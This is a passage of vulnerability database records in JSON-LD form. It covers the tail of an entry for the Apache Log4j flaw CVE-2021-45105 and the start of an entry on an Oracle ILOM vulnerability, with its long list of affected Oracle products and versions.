"https://access.redhat.com/security/cve/cve-2022-23305", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-23307", }, { trust: 0.2, url: "https://issues.jboss.org/):", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2021-4104", }, { trust: 0.1, url: 
"https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches&product=appplatform&version=7.4", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2022:0216", }, { trust: 0.1, url: "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009", }, { trust: 0.1, url: "https://access.redhat.com/solutions/6577421", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2022:1297", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2022:1296", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_single_sign-on/7.5/html/release_notes/index", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2022:1469", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.rhsso&downloadtype=patches&version=7.5", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/apache-log4j2/2.17.1-0.20.04.1", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/apache-log4j2/2.17.1-0.21.04.1", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/apache-log4j2/2.12.4-0ubuntu0.1", }, { trust: 0.1, url: "https://ubuntu.com/security/notices/usn-5222-1", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/apache-log4j2/2.17.1-0.21.10.1", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhba-2022:0025", }, { trust: 0.1, url: "https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html", }, { trust: 0.1, url: "https://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2021-40346", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2021-39241", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2022:0026", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2021-39241", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2021-40346", }, ], sources: [ { 
db: "ZDI", id: "ZDI-21-1541", }, { db: "VULHUB", id: "VHN-408743", }, { db: "PACKETSTORM", id: "165636", }, { db: "PACKETSTORM", id: "166676", }, { db: "PACKETSTORM", id: "166677", }, { db: "PACKETSTORM", id: "166798", }, { db: "PACKETSTORM", id: "165516", }, { db: "PACKETSTORM", id: "165552", }, { db: "NVD", id: "CVE-2021-45105", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "ZDI", id: "ZDI-21-1541", }, { db: "VULHUB", id: "VHN-408743", }, { db: "VULMON", id: "CVE-2021-45105", }, { db: "PACKETSTORM", id: "165636", }, { db: "PACKETSTORM", id: "166676", }, { db: "PACKETSTORM", id: "166677", }, { db: "PACKETSTORM", id: "166798", }, { db: "PACKETSTORM", id: "165516", }, { db: "PACKETSTORM", id: "165552", }, { db: "NVD", id: "CVE-2021-45105", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2021-12-19T00:00:00", db: "ZDI", id: "ZDI-21-1541", }, { date: "2021-12-18T00:00:00", db: "VULHUB", id: "VHN-408743", }, { date: "2021-12-18T00:00:00", db: "VULMON", id: "CVE-2021-45105", }, { date: "2022-01-20T17:49:52", db: "PACKETSTORM", id: "165636", }, { date: "2022-04-11T17:14:49", db: "PACKETSTORM", id: "166676", }, { date: "2022-04-11T17:15:55", db: "PACKETSTORM", id: "166677", }, { date: "2022-04-21T15:09:01", db: "PACKETSTORM", id: "166798", }, { date: "2022-01-12T15:36:56", db: "PACKETSTORM", id: "165516", }, { date: "2022-01-13T16:32:51", db: "PACKETSTORM", id: "165552", }, { date: "2021-12-18T12:15:07.433000", db: "NVD", id: "CVE-2021-45105", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2021-12-19T00:00:00", db: "ZDI", id: "ZDI-21-1541", }, { date: "2022-10-06T00:00:00", db: "VULHUB", id: "VHN-408743", }, { date: "2022-10-06T00:00:00", db: "VULMON", 
id: "CVE-2021-45105", }, { date: "2024-11-21T06:31:58.170000", db: "NVD", id: "CVE-2021-45105", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "remote", sources: [ { db: "PACKETSTORM", id: "166676", }, { db: "PACKETSTORM", id: "166677", }, { db: "PACKETSTORM", id: "165516", }, ], trust: 0.3, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Apache Log4j StrSubstitutor Uncontrolled Recursion Denial-of-Service Vulnerability", sources: [ { db: "ZDI", id: "ZDI-21-1541", }, ], trust: 0.7, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "code execution", sources: [ { db: "PACKETSTORM", id: "165636", }, { db: "PACKETSTORM", id: "165516", }, ], trust: 0.2, }, }
var-201607-0654
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors. A denial-of-service (DoS) attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker
Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server. Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'HTTP' protocol. The 'Backup-Restore' subcomponent is affected. This vulnerability affects the following supported ILOM versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation.
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0654", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", 
version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: 
"oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail 
store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail 
integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: 
"13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy 
automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, 
{ model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", 
